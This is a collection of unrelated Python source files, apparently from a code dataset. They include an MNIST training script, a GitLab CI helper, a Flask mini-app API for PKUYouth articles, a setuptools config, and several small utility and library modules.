register_device(self.project_id, self.credentials,
self.device_model_id, device_id)
pathlib.Path(os.path.dirname(self.devconfig_file)).mkdir(exist_ok=True)
with open(self.devconfig_file, 'w') as f:
json.dump({
'last_device_id': device_id,
'model_id': self.device_model_id,
}, f)
else:
LOGGER.error("Device is not registered!")
for event in events:
if self._exit.is_set():
return
self.process_event(event)
|
nilq/baby-python
|
python
|
import time
# only required to run python3 examples/cvt_arm.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import Dataset
import os
import math
import numpy as np
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_size = 64 # batch size in every epoch
class CustomDataset(Dataset):
def __init__(self, data, targets, transform=None, target_transform=None):
self.data = data
self.targets = targets
self.transform = transform
self.target_transform = target_transform
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
img, target = self.data[idx], self.targets[idx]
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
train_dataset = datasets.MNIST(root = 'data/', train=True, download=False,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
# training set
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4,
drop_last=True)
test_dataset = datasets.MNIST(root = 'data/', train=False, download=False,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
# test set
test_loader = torch.utils.data.DataLoader(test_dataset,
batch_size=100,
shuffle=True,
num_workers=4,
drop_last=False)
inv_adv_examples = np.load("invariance_examples/final_l0/inv_adv_examples.npy") # visualize this for sanity check
human_labels = np.load("invariance_examples/final_l0/human_labels.npy")
inv_eg_dataset = CustomDataset(data=inv_adv_examples,
targets=human_labels,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
]))
inv_eg_dataloader = torch.utils.data.DataLoader(inv_eg_dataset,
batch_size=10,
shuffle=True,
num_workers=4,
drop_last=False)
class MLP(nn.Module):
def __init__(self, input_size=784, output_size=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_size, 20)
self.fc2 = nn.Linear(20, output_size)
def forward(self, x):
x = x.view(-1, 28 * 28)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
return F.log_softmax(x, dim=1)
model = MLP()
model = model.to(device)
epochs = 100
# specify loss function
criterion = nn.CrossEntropyLoss()
# specify optimizer
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
model.train() # prep model for training
standard_acc_arr = []
robust_acc_arr = []
for epoch in range(epochs):
# monitor training loss
train_loss = 0.0
###################
# train the model #
###################
for data, target in train_loader:
data, target = data.to(device), target.to(device)
# clear the gradients of all optimized variables
optimizer.zero_grad()
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# calculate the loss
loss = criterion(output, target)
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item()*data.size(0)
#--------------------------------------------------------------------------------------
# initialize lists to monitor test loss and accuracy
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for *evaluation*
for data, target in test_loader:
data, target = data.to(device), target.to(device)
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(len(target)):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
test_accuracy = 100. * np.sum(class_correct) / np.sum(class_total)
standard_acc_arr.append(test_accuracy)
print('\n Standard test accuracy: %2d%% (%2d/%2d)' % (test_accuracy,
np.sum(class_correct),
np.sum(class_total)))
#--------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------
# initialize lists to monitor test loss and accuracy
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for *evaluation*
for data, target in inv_eg_dataloader:
data, target = data.to(device), target.to(device)
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(len(target)):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
test_accuracy = 100. * np.sum(class_correct) / np.sum(class_total)
robust_acc_arr.append(test_accuracy)
print('\n Robust test accuracy: %2d%% (%2d/%2d)' % (test_accuracy,
np.sum(class_correct),
np.sum(class_total)))
#--------------------------------------------------------------------------------------
save_path = "saved_stuff/eval_mlp/"
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(standard_acc_arr, os.path.join(save_path, "standard_acc_arr.pt"))
torch.save(robust_acc_arr, os.path.join(save_path, "robust_acc_arr.pt"))
|
nilq/baby-python
|
python
|
import os
import requests
from datetime import datetime, timedelta
import gitlab
class Gitlab():
def __init__(self, api_url, **kwargs):
self.gitlab = gitlab.Gitlab(api_url, **kwargs)
def is_gitlab(self):
if os.environ.get('CI', 'false') == 'true':
return True
else:
return False
def is_pull_request(self):
if self.is_gitlab() and os.environ.get('CI_MERGE_REQUEST_ID', None) is not None:
return True
else:
return False
def branch(self):
if self.is_gitlab():
return os.environ.get('CI_COMMIT_BRANCH')
else:
return 'master'
def commit_hash(self):
return os.environ.get('CI_COMMIT_SHA', '0' * 30)
def short_commit_hash(self):
return os.environ.get('CI_COMMIT_SHA', '0' * 30)[:7]
def tag(self):
return os.environ.get('CI_COMMIT_TAG', None)
def is_tag(self):
if os.environ.get('CI_COMMIT_TAG', False):
return True
else:
return False
def home_dir(self):
return os.environ.get('HOME', '/dev/null')
def build_dir(self):
return os.environ.get('CI_BUILDS_DIR', '/dev/null')
def build_number(self):
prj = self.gitlab.projects.get(os.environ['CI_PROJECT_ID'])
var = None
try:
var = prj.variables.get('BUILD_NUMBER')
except gitlab.exceptions.GitlabGetError as e:
if e.response_code == 404:
prj.variables.create({'key': 'BUILD_NUMBER', 'value': '0'})
var.value = str(int(var.value) + 1)
var.save()
return int(var.value)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---------------------------------------
# Project: PKUYouth Webserver v2
# File: __init__.py
# Created Date: 2020-07-28
# Author: Xinghong Zhong
# ---------------------------------------
# Copyright (c) 2020 PKUYouth
import time
import datetime
import calendar
from functools import wraps
from collections import OrderedDict
from pypinyin import lazy_pinyin
from flask import Blueprint, current_app, g, abort
from ...models import db, WxUser, Article, WxUserArticle, Reporter, ArticleReporter
from ...core.flask.parser import get_str_field, get_int_field, get_bool_field
from ...core.redis.types import RedisAutoExpiredMap
from ...core.utils import u, xMD5
from ...core.exceptions import MiniappUnauthorized, RequestArgumentError
from .api import jscode2session
bpMiniapp = Blueprint('miniapp', __name__)
utoken_map = None
UTOKEN_EXPIRES = 3600 * 12
PAGE_SIZE = 8
QINIU_IMAGE_PREFIX = "https://qiniu.rabbitzxh.top/pkuyouth"
APP_CONFIG = {
"prefix": {
"column": QINIU_IMAGE_PREFIX + "/column_cover/",
"sm_cover": QINIU_IMAGE_PREFIX + "/sm_cover/",
"bg_cover": QINIU_IMAGE_PREFIX + "/bg_cover/"
},
"app_info": {
"name": "北大青年",
"version": "2.0.0",
}
}
INDEX_COL_DESC = [
{
"id": 0,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508266021.jpeg',
"title": '随便看看',
"desc": '随意翻翻北青的文章',
"path": '/pages/collection-random/collection-random',
},
{
"id": 1,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508283011.jpeg',
"title": '热文排行',
"desc": '看看那些阅读量最高的文章',
"path": '/pages/collection-hot/collection-hot',
},
{
"id": 2,
"cover": QINIU_IMAGE_PREFIX + '/bg_cover/26508251861.jpeg',
"title": '还有更多',
"desc": '主编们正在努力整理 ...',
"path": '',
}
]
COLUMNS_LIST = OrderedDict({
"调查": "只做好一件事——刨根问底",
"人物": "今天载了位了不得的人物",
"特稿": "不停留在表面",
"视界": "一览众山小",
"光阴": "不忘初心,继续前进",
"姿势": "干货、湿货、杂货,老司机带你涨姿势",
"言己": "说出你的故事",
"又见": "如果在异乡,一个旅人",
"雕龙": "操千曲而后晓声,观千剑而后识器",
"评论": "条条大路,众生喧哗",
"摄影": "我为了把你拍得更漂亮嘛~",
"图说": "边走边看",
"机动": "说走就走,想停就停;可以跑高速,亦可钻胡同",
"现场": "一车载你直达热点",
"对话": "听见你的声音",
"纪念": "为了未来,收藏过去",
"节日": "今天应该很高兴",
"新年献词": "新时代,新青年",
# "翻译": "null",
})
def init_utoken_map():
global utoken_map
if utoken_map is not None:
return
utoken_map = RedisAutoExpiredMap(
namespace=current_app.config['CACHE_KEY_PREFIX'] + "miniapp_utk",
expires=UTOKEN_EXPIRES,
)
def generate_utoken(openid, session_key):
return xMD5("%s:%s:%s" % (openid, session_key, int(time.time() * 1000)))
def get_range(page, size):
page = max(page, 1)
return ((page - 1) * size, page * size)
def verify_utoken(func):
@wraps(func)
def wrapper(*args, **kwargs):
init_utoken_map()
utoken = get_str_field('utoken')
openid = utoken_map[utoken]
if openid is None:
raise MiniappUnauthorized("Invalid utoken")
g.openid = u(openid)
ret = func(*args, **kwargs)
return ret
return wrapper
@bpMiniapp.route('/', methods=["GET","POST"])
def root():
abort(404)
@bpMiniapp.route('/login', methods=["POST"])
def login():
"""
Method POST
JSON:
- js_code str
Return:
- errcode int
- utoken str
- setting dict
- auto_change_card bool
- use_small_card bool
- config dict
"""
init_utoken_map()
js_code = get_str_field('js_code')
openid, session_key = jscode2session(js_code)
utoken = generate_utoken(openid, session_key)
utoken_map[utoken] = openid
user = WxUser.query.get(openid)
if user is None:
user = WxUser(openid)
db.session.add(user)
db.session.commit()
return {
"errcode": 0,
"utoken": utoken,
"setting": {
"auto_change_card": user.auto_change_card,
"use_small_card": user.use_small_card,
},
"config": APP_CONFIG,
}
@bpMiniapp.route('/get_col_desc', methods=["GET"])
@verify_utoken
def get_col_desc():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- col_desc [dict]
- id int
- cover str
- title str
- desc str
- path str
"""
return {
"errcode": 0,
"col_desc": INDEX_COL_DESC,
}
@bpMiniapp.route('/get_col_random', methods=["GET"])
@verify_utoken
def get_col_random():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(db.func.rand()).\
limit(PAGE_SIZE).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_latest_articles', methods=["GET"])
@verify_utoken
def get_latest_articles():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
sbq = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(Article.masssend_time.desc()).\
limit(PAGE_SIZE).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.read_num,
Article.like_num,
Article.masssend_time,
Article.cover_url
).\
join(sbq, sbq.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_col_hot', methods=["GET"])
@verify_utoken
def get_col_hot():
"""
Method GET
Args:
- utoken str
- page int
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
page = get_int_field('page')
st, ed = get_range(page, PAGE_SIZE)
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
order_by(
Article.read_num.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
slice(st, ed).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.read_num.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_column_list', methods=["GET"])
@verify_utoken
def get_column_list():
"""
Method GET
Args:
- utoken str
Return:
- errcode int
- columns [dict]
- id int
- title str
- desc str
- cover str
- article_count int
"""
columns = list(COLUMNS_LIST.keys())
rlist = db.session.\
query(
Article.column,
db.func.count(Article.aid).label('count'),
).\
filter(Article.hidden == 0).\
filter(Article.column.in_(columns)).\
group_by(Article.column).\
all()
counter = { r.column: r.count for r in rlist }
return {
"errcode": 0,
"columns": [
{
"id": ix,
"title": title,
"desc": desc,
"cover": "%s.jpg" % ''.join(lazy_pinyin(title)),
"article_count": counter.get(title, 0),
}
for ix, (title, desc) in enumerate(COLUMNS_LIST.items())
],
}
@bpMiniapp.route('/get_column_articles', methods=["GET"])
@verify_utoken
def get_column_articles():
"""
Method GET
Args:
- utoken str
- column str
- page int if page == 0, return all articles in this column
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
column = get_str_field('column', limited=COLUMNS_LIST)
page = get_int_field('page')
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.column == column).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
)
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq1 = sbq1.slice(st, ed)
sbq1 = sbq1.subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_date_range', methods=["GET"])
@verify_utoken
def get_date_range():
"""
Method GET
Args:
- utoken str
"""
rlist = db.session.\
query(
db.func.min(Article.masssend_time),
db.func.max(Article.masssend_time)
).\
first()
st, ed = map(lambda t: time.strftime("%Y-%m-%d", time.localtime(t)), rlist)
return {
"errcode": 0,
"range": {
"start": st,
"end": ed,
}
}
@bpMiniapp.route('/search_reporters', methods=["GET"])
@verify_utoken
def search_reporters():
"""
Method GET
Args:
- utoken str
- keyword str
Return:
- errcode int
- reporters [dict]
- name str
- articles [int]
"""
keyword = get_str_field("keyword")
names = [ name.strip() for name in keyword.split() if len(name.strip()) > 0 ]
sbq = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
subquery()
reporters = db.session.\
query(
Reporter.name,
db.func.count(sbq.c.aid).label('article_count'),
).\
join(ArticleReporter, ArticleReporter.rid == Reporter.rid).\
join(sbq, sbq.c.aid == ArticleReporter.aid).\
filter(Reporter.name.in_(names)).\
group_by(Reporter.rid).\
order_by(db.desc('article_count')).\
all()
return {
"errcode": 0,
"reporters": [ r._asdict() for r in reporters ],
}
@bpMiniapp.route('/get_reporter_articles', methods=["GET"])
@verify_utoken
def get_reporter_articles():
"""
Method GET
Args:
- utoken str
- name str
- page int if page == 0, return all articles in this column
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
name = get_str_field('name')
page = get_int_field('page')
sbq1 = db.session.\
query(Article.aid).\
join(ArticleReporter, ArticleReporter.aid == Article.aid).\
join(Reporter, Reporter.rid == ArticleReporter.rid).\
filter(Reporter.name == name).\
filter(Article.hidden == 0).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
)
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq1 = sbq1.slice(st, ed)
sbq1 = sbq1.subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ],
}
@bpMiniapp.route('/search_articles_by_date', methods=["GET"])
@verify_utoken
def search_articles_by_date():
"""
Method GET
Args:
- utoken str
- date str
- level str options: ('month','day')
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
date = get_str_field('date')
level = get_str_field('level', limited=['month','day'])
try:
dt = datetime.datetime.strptime(date, '%Y-%m-%d')
except ValueError as e:
raise RequestArgumentError("Invalid date %s" % date)
if level == 'month':
st = datetime.datetime(dt.year, dt.month, 1)
span = calendar.monthrange(dt.year, dt.month)[1]
else:
st = dt
span = 1
ed = st + datetime.timedelta(span)
st, ed = map(lambda dt: int(dt.timestamp()), [st, ed])
sbq1 = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.masssend_time.between(st, ed)).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ],
}
@bpMiniapp.route('/search_articles_by_keyword', methods=["GET"])
@verify_utoken
def search_articles_by_keyword():
"""
Method GET
Args:
- utoken str
- keyword str
- filter str options: ('all','favorite')/column/reporter
- page int
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
keyword = get_str_field('keyword')
ft = get_str_field('filter')
page = get_int_field('page')
st, ed = get_range(page, PAGE_SIZE)
sbq1 = db.session.\
query(
Article.aid,
db.fts_match(
Article.ix_text,
keyword,
db.fts_match.BOOLEAN
).label('score')
)
if ft == 'all':
pass
elif ft == 'favorite':
sbq1 = sbq1.\
join(WxUserArticle).\
filter(WxUserArticle.openid == openid)
elif ft in COLUMNS_LIST:
sbq1 = sbq1.\
filter(Article.column == ft)
else:
sbq1 = sbq1.\
join(ArticleReporter, ArticleReporter.aid == Article.aid).\
join(Reporter, Reporter.rid == ArticleReporter.rid).\
filter(Reporter.name == ft)
sbq1 = sbq1.\
filter(Article.hidden == 0).\
order_by(
db.desc('score'),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
slice(st, ed).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
sbq1.c.score.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_starred_articles', methods=["GET"])
@verify_utoken
def get_starred_articles():
"""
Method GET
Args:
- utoken str
- page int
"""
openid = g.openid
page = get_int_field('page')
sbq = db.session.\
query(
Article.aid,
WxUserArticle.ctime,
).\
join(WxUserArticle).\
filter(WxUserArticle.openid == openid).\
filter(Article.hidden == 0).\
order_by(WxUserArticle.ctime.desc())
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq = sbq.slice(st, ed)
sbq = sbq.subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq.c.ctime.label('star_time'),
).\
join(sbq, sbq.c.aid == Article.aid).\
order_by(db.desc('star_time')).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/star_article', methods=["POST"])
@verify_utoken
def star_article():
"""
Method POST
JSON:
- utoken str
- aid int
- action str options: ('star','unstar')
Return:
- errcode int
"""
openid = g.openid
aid = get_int_field('aid')
action = get_str_field('action', limited=['star','unstar'])
ret = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.aid == aid).\
first()
if ret is None:
raise RequestArgumentError("Article %d was not found" % aid)
ua = WxUserArticle.query.\
filter(WxUserArticle.aid == aid).\
filter(WxUserArticle.openid == openid).\
first()
if action == 'star' and ua is None:
ua = WxUserArticle(openid, aid)
db.session.add(ua)
db.session.commit()
if action == 'unstar' and ua is not None:
db.session.delete(ua)
db.session.commit()
return {
"errcode": 0
}
@bpMiniapp.route('/change_setting', methods=["POST"])
@verify_utoken
def change_setting():
"""
Method POST
JSON:
- utoken str
- key str
- value bool
Return:
- errcode int
"""
openid = g.openid
key = get_str_field('key')
value = get_bool_field('value')
user = WxUser.query.get(openid)
if key == 'auto_change_card':
user.auto_change_card = value
elif key == 'use_small_card':
user.use_small_card = value
else:
raise RequestArgumentError("Invalid setting key %s" % key)
db.session.commit()
return {
"errcode": 0
}
|
nilq/baby-python
|
python
|
import os
import re
import sys
import codecs
from setuptools import setup, find_packages, Command
from setuptools.command.test import test as TestCommand
here = os.path.abspath(os.path.dirname(__file__))
setup_requires = ['pytest', 'tox']
install_requires = ['six', 'tox', 'atomos']
tests_require = ['six', 'pytest-cov', 'pytest-cache', 'pytest-timeout']
dev_requires = ['pyflakes', 'pep8', 'pylint', 'check-manifest',
'ipython', 'ipdb', 'sphinx', 'sphinx_rtd_theme',
'sphinxcontrib-napoleon']
dev_requires.append(tests_require)
PY2 = sys.version_info.major is 2
PY3 = sys.version_info.major is 3
if PY2:
install_requires.append('futures')
install_requires.append('enum34')
if PY3:
install_requires.append('enum34')
version = "0.0.0"
changes = os.path.join(here, "CHANGES.md")
match = '^#*\s*(?P<version>[0-9]+\.[0-9]+(\.[0-9]+)?)$'
with codecs.open(changes, encoding='utf-8') as changes:
for line in changes:
match = re.match(match, line)
if match:
version = match.group("version")
break
# Get the long description
with codecs.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Get version
with codecs.open(os.path.join(here, 'CHANGES.md'), encoding='utf-8') as f:
changelog = f.read()
class VersionCommand(Command):
description = "print library version"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
print(version)
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--strict', '--verbose', '--tb=long',
'--cov', 'hystrix', '--cov-report',
'term-missing', 'tests']
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
class Tox(TestCommand):
user_options = [('tox-args=', 'a', "Arguments to pass to tox")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = None
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import tox
import shlex
args = self.tox_args
if args:
args = shlex.split(self.tox_args)
errno = tox.cmdline(args=args)
sys.exit(errno)
setup(
name='hystrix-py',
version='0.1.0',
description='A Netflix Hystrix implementation in Python',
long_description=long_description,
url='https://github.com/wiliamsouza/hystrix-py',
author='The Hystrix Python Authors',
author_email='wiliamsouza83@gmail.com',
license='Apache Software License 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Library',
'License :: OSI Approved :: Apache Software License 2.0',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='sample setuptools development',
packages=find_packages(exclude=['docs', 'tests']),
setup_requires=setup_requires,
install_requires=install_requires,
tests_require=tests_require,
extras_require={
'dev': dev_requires,
'test': tests_require,
},
cmdclass={
"version": VersionCommand,
'test': PyTest,
"tox": Tox,
},
)
|
nilq/baby-python
|
python
|
# Unsere Funktion nimmt eine Liste als Parameter
def find_nouns(list_of_words):
nouns = list()
# Das erste Wort ist wahrscheinlich großgeschrieben, fällt aber aus unserer Definition raus
for i in range(1, len(list_of_words)):
current_word = list_of_words[i]
if current_word[0].isupper():
# list_of_words[i-1]: Das vorherige Wort
if not list_of_words[i-1].endswith("."):
nouns.append(current_word)
return nouns
with open("hase_igel.txt") as f:
story = f.read()
words = story.split()
nouns = find_nouns(words)
with open("hase_igel_nouns.txt", "w") as result:
for noun in nouns:
result.write(noun + ", ")
|
nilq/baby-python
|
python
|
from app import app
from flask import Blueprint, render_template
@app.errorhandler(404)
def not_found_error():
return render_template('errors/404.html'), 404
@app.errorhandler(500)
def internal_error(error):
return render_template('errors/500.html'), 500
|
nilq/baby-python
|
python
|
import glob
import numpy as np
import sys
import argparse
def main():
parser = argparse.ArgumentParser(description="Produce report from result files")
parser.add_argument('--path', type=str, default="",
help="Path to the result files (* will be appended)")
args = parser.parse_args()
test_accuracies = []
train_accuracies = []
train_losses = []
for f in glob.glob(args.path+"*"):
with open(f) as ff:
loss, train_acc, test_acc = map(float, ff.readline().split())
test_accuracies.append(test_acc)
train_accuracies.append(train_acc)
train_losses.append(loss)
print("Test: {:.4f} ± {:.4f}".format(np.mean(test_accuracies),\
np.std(test_accuracies)))
print("Train: {:.4f} ± {:.4f}".format(np.mean(train_accuracies),\
np.std(train_accuracies)))
print("Loss: {:.4f} ± {:.4f}".format(np.mean(loss),\
np.std(loss)))
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
# This sample tests the case where a protocol class derives from
# another protocol class.
from typing import Generic, TypeVar, Protocol
Arg = TypeVar("Arg", contravariant=True)
Value = TypeVar("Value")
class Base1(Protocol[Value]):
def method1(self, default: Value) -> Value:
...
class Base2(Base1[Value], Protocol):
def method2(self, default: Value) -> Value:
...
class Interface(Base2[Value], Protocol[Arg, Value]):
def another(self, arg: Arg) -> None:
...
class Implementation1(Generic[Arg, Value]):
def method1(self, default: Value) -> Value:
return default
def method2(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func1(arg: Arg, value: Value) -> Interface[Arg, Value]:
return Implementation1[Arg, Value]()
class Implementation2(Generic[Arg, Value]):
def method1(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func2(arg: Arg, value: Value) -> Interface[Arg, Value]:
# This should generate an error because
# Implementation2 doesn't implement method2.
return Implementation2[Arg, Value]()
class Implementation3(Generic[Arg, Value]):
def method1(self, default: int) -> int:
return default
def method2(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func3(arg: Arg, value: Value) -> Interface[Arg, Value]:
# This should generate an error because
# Implementation3's signature doesn't match.
return Implementation3[Arg, Value]()
|
nilq/baby-python
|
python
|
import collections
from supriya import CalculationRate
from supriya.synthdefs import WidthFirstUGen
class ClearBuf(WidthFirstUGen):
"""
::
>>> clear_buf = supriya.ugens.ClearBuf.ir(
... buffer_id=23,
... )
>>> clear_buf
ClearBuf.ir()
"""
### CLASS VARIABLES ###
__documentation_section__ = "Buffer UGens"
_ordered_input_names = collections.OrderedDict([("buffer_id", None)])
_valid_calculation_rates = (CalculationRate.SCALAR,)
|
nilq/baby-python
|
python
|
from collections import OrderedDict
from itertools import takewhile
from dht.utils import last
class Cluster(object):
def __init__(self, members):
self.hash = hash
self.members = OrderedDict(((self.hash(node), node) for node in members))
def __len__(self):
return sum((len(node) for node in self.members.values()))
def __getitem__(self, key):
return self.location(key)[key]
def __setitem__(self, key, value):
self.location(key)[key] = value
def __delitem__(self, key):
del self.location(key)[key]
def location(self, key):
"""
Returns where a given key should be stored.
"""
hashed = self.hash(key)
try:
return last(takewhile(lambda pair: pair[0] <= hashed,
self.members.items()))[1]
except ValueError:
# "wrap around" the ring of nodes to the last node if no nodes
# have a hashed value that is lower than or equal to the hashed
# value of the key
return self.members.values()[-1]
|
nilq/baby-python
|
python
|
from typing import Optional
from pydantic import BaseSettings, Json
from ._version import version as __version__ # NOQA
class Settings(BaseSettings):
auth_token_url: str = "https://solarperformanceinsight.us.auth0.com/oauth/token"
auth_jwk_url: str = (
"https://solarperformanceinsight.us.auth0.com/.well-known/jwks.json"
)
auth_key: Json
auth_audience: str = "https://app.solarperformanceinsight.org/api"
auth_issuer: str = "https://solarperformanceinsight.us.auth0.com/"
auth_client_id: str = "G1YyfLdseYn10RQo11Lqee2ThXj5l5fh"
traces_sample_rate: Optional[float] = None
class Config:
env_prefix = "spi"
settings = Settings()
|
nilq/baby-python
|
python
|
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.decorators import action
from backend.api.models import MiembroSprint, Usuario, Rol
